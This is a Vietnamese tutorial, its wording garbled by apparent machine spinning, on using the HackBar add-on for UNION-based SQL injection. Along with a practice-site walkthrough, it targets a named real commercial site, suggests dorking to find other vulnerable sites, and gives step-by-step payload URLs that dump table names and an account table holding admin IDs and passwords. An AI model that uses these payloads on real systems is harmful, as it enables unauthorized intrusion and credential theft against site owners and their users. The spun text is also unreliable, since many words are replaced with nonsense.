Cách sử dụng hackbar

Lưu ý: bài viết chỉ mang tính chất hóa học phục vụ mang lại học hành, tò mò phương pháp hoạt động nhằm chống tách tốt rộng mang đến đồ gia dụng án của doanh nghiệp, đầy đủ hành vi của các bạn công ty chúng tôi sẽ không còn Chịu trách rưới nhiệm!

Bài viết triển khai dựa trên trình phê chuẩn Firefox


I. LÝ THUYẾT (để làm việc thành công xuất sắc, chúng ta đề nghị phát âm kỹ phần thực hành)

1. Phát hiện

Để vạc hiện tại một áp dụng web gồm bám lỗi Squốc lộ Injection hay không, ta phân phối câu truy tìm vấn những meta character trong số hệ quản ngại trị cửa hàng tài liệu, chẳng hạn như vệt nháy đơn, vết nháy kép, dấu chấm phẩy và các cam kết từ bỏ phản hồi (–, ##, /**/)… cùng đợi coi áp dụng web đang xứ lý câu truy vấn vấn đó ra sao. Trong gợi ý này, bọn họ sẽ áp dụng cùng với liên tưởng sau: http://zerocoolhf.altervista.org/level1.php?id=1

Thêm vào thời gian cuối link bên trên một trong các meta character đã nói ở trên, chẳng hạn ta phân phối dấu nháy đơn: http://zerocoolhf.altervista.org/level1.php?id=1"

Thông báo lỗi tự mysql lộ diện, điều đó website này đã bị bám lỗi SQL injection.

Bạn đang xem: Cách sử dụng hackbar

2. Xác định con số cột trong mệnh đề select

Union là trường đoản cú khóa dùng làm gộp tác dụng của không ít mệnh đề select cho nên vì thế trong những mệnh đề select đòi hỏi con số các ngôi trường đa số bắt buộc cân nhau và hầu hết bởi con số những trường được select vào mệnh đề select ban sơ. Chúng ta đang sử dụng điều này để xác minh con số cột của clàm việc sở tài liệu.

Cụ thể, họ sẽ thực hiện test dần bằng phương pháp tăng dần đều số lượng cột vào mệnh đề select sau union (bước đầu trường đoản cú 1). Khi làm sao ko thấy thông tin lỗi mở ra thì đó đó là con số cột buộc phải tìm kiếm.

Một biện pháp nhanh khô rộng là sử dụng ‘order by’. Từ khóa ‘order by’ được dùng làm sắp xếp thiết bị từ bỏ cho các bạn dạng ghi thu được vào mệnh nhằm select. Sau order by hoàn toàn có thể là tên gọi một cột để xác minh rằng công dụng tiếp thu sẽ được thu xếp theo cực hiếm của cột kia (tăng cao hoặc sút dần). Sau ‘order by’ cũng rất có thể là số đồ vật từ vị trí của cột kia. Nếu quý giá sau order to hơn số cột được select thì họ đã thấy thông báo lỗi.

Xem thêm: Tại Sao Phải Ăn Sáng Có Phải Là Bữa Ăn Quan Trọng Nhất? Tại Sao Phải Ăn Sáng

Quay quay lại ví dụ:

http://zerocoolhf.altervista.org/level1.php?id=1 order by 1-- -

http://zerocoolhf.altervista.org/level1.php?id=1 order by 2-- -

http://zerocoolhf.altervista.org/level1.php?id=1 order by 3-- -

http://zerocoolhf.altervista.org/level1.php?id=1 order by 4-- -

Thông báo lỗi xuất hiện thêm. bởi vậy, ta xác minh được số cột là 3.

3. Xác định thông tin

Để biết được tên bảng, thương hiệu cột, ta sử dụng đối tượng người tiêu dùng information_schema. Đối tượng này cung ứng những báo cáo về tables, columns, views cùng procedures… của cửa hàng tài liệu.

Tiếp tục cùng với ví dụ:

http://zerocoolhf.altervista.org/level1.php?id=-1 union select 1,2,3-- -

Lỗi trả về cho ta thấy có vẻ như ‘unio’ đã bị xóa mất. Thử lại với:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select 1,2,3-- -

Thành công. Ta đã thấy cột số 2 và 3 bị lỗi. Lấy phiên phiên bản của hệ cai quản trị cửa hàng dữ liệu cùng thương hiệu các đại lý dữ liệu:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounion select 1,version(),database()-- -

bởi thế thương hiệu cơ sở tài liệu là my_zerocoolhf với phiên bạn dạng của hệ quản lí trị cơ sở dữ liệu là MySQL 5.1.71-community-log. Tiếp tục, rước tên những bảng trong đại lý dữ liệu:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounionselect all 1,group_concat(table_name),3 from information_schema.tableswhere table_schema=database()-- -

Cơ sở dữ liệu bao gồm 2 bảng là auth cùng book. Chúng ta đang test lấy nội dung các bạn dạng ghi trong bảng book. Trước không còn khẳng định những ngôi trường của bảng book. Thực hiện:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounionselect all 1,group_concat(column_name),3 from information_schema.columnswhere table_name=0x626f6f6b-- -

(0x626f6f6b là mã hex của tên bảng book, giống như nếu muốn mang tên những ngôi trường của bảng auth thì chỉ cần thay mã hex của auth vào vị trí của 0x626f6f6b)

Tên các trường: id, title, price, author. Bây giờ đồng hồ ta sẽ mang nội dung các bản ghi trong cửa hàng dữ liệu:

http://zerocoolhf.altervista.org/level1.php?id=-1 uniounionselect all 1,group_concat(id,0x3a,title,0x3a,price,0x3a,author),3 frombook-- -

(group_concat nhằm nối nhiều cực hiếm với nhau. 0x3a là vệt “:”, nhằm ngăn cách mang lại dễ dàng nhìn)

do đó, ta rất có thể đem được toàn cục cơ sở tài liệu của site bị lỗi SQL injection.

Xem thêm: Hướng Dẫn Tạo Tài Khoản V Line, Hướng Dẫn Sử Dụng V

II. THỰC HÀNH


1.Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search ” Hackbar ” )

2. 1 mẫu đầu và hồ hết ngón tay =>>z~

Hiện tại Tiến Hành Với Victlặng Nhé !

Victyên : http://pscells.com ( Hoặc Có Thế Lên Google Gõ “inurl:index.php?id=” Để Dork tra cứu Site Bị Lỗi Squốc lộ )

Đi 1 Vòng Site Tìm Link Có Dạng ?id=

Chẳng hạn nlỗi liên kết này : http://pscells.com/chitietsanpsi mê.php?id=40

Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ‘ Vào Và Ta Đc Link Nlỗi Thế Này :

http://pscells.com/chitietsanpmê man.php?id=40‘

Nếu Site Có Lỗi Thì Nó Sẽ Hiện Nlỗi Thế này :


*

Sau Đó Dùng Lệnh Order By Để Tìm Số Cột (Column)

Lưu ý: sau từng câu lệnh (đường dẫn) các bạn phải thêm 2 dấu trừ ( – – ) Có nghĩa là vết comment (chụ thích) vào câu lệnh SQL. Tức là họ cố ý quăng quật đa số câu lệnh phía sau lốt kia.

*

Bây h Dùng Lệnh UNION SELECT nhằm khai thác nóVậy ta đang sử dụng lệnh UNION SELECT với số cột là 8

Ta Sẽ Có Link :http://pscells.com/chitietsanpsi mê.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8 – –

Txuất xắc Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :

http://pscells.com/chitietsanpsi.php?id=null UNION SELECT 1,2,3,4,5,6,7,8 – –

Nếu Cột Nào Đó Từ 1 -> 8 bị lỗi thì nó vẫn hiện tại số ở đâu kia vào trang web (chúng ta chuyên cần search kĩ xíu nhé) :

Vậy Cột 6 Bị Lỗi Nhé

*
Bây giờ ta khai quật với lệnh nhỏng sau:

http://pscells.com/chitietsanptê mê.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database() – –

( Thay Thế group_concat(table_name) vào số cột bị lỗi mà ta đang search hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Các Table Có Trong Database )

Và Sau Đó Ta Đc Các Table Của Database Như Hình :


*

Lưu Ý Chúng Ta Cần Tìm ID và Pass Của Admin , Nên Ta Sẽ Chọn Table Có Liên Quan Đến Tài Khoản Người Dùng . Như Trong Hình Là Table ” taikhoan ”


*

Tiếp Theo Tìm Các Column Trong Table taikhoan . Cần Phải Encode (dùng add-on hackbar trên firefox nhằm encode) tên table thanh lịch mã Hex Và thêm trước nó “0x” Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex cũa taikhoan là 7461696b686f616e Thêm “0x” ỡ đầu vẫn thành :0x7461696b686f616e http://pscells.com/chitietsanpđê mê.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database() – –

Thành

http://pscells.com/chitietsanpđắm say.php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e – –

Ta đang được:


*

Tiếp theo đem quý hiếm trường đoản cú những column này ra ( Ko Cần Dùng Mã Hex Cho Các Tên Column Này )

Đổi liên kết ỡ một số địa điểm :

http://pscells.com/chitietsanpsi mê.php?id=null UNION SELECT 1,2,3,4,5,group_concat(id,0x207c20,name,0x207ctrăng tròn,pass,0x207c20),7,8 from taikhoan – –

Lưu ý: Mã Hex 0x207ctrăng tròn Là Mã Hex Của ” | ” Mình Đễ Vậy Để Phân Cách Các Giá Trị Sau lúc Get Cho Dễ Nhìn ^^! Ko Cần Thiết Lắm

Xóa Hết Phần Sau Chừa Lại from Và Thêm Tên Table Mà Hồi Nãy Mình Knhì Thác Nlỗi : taikhoan


Chuyên mục: Kiến thức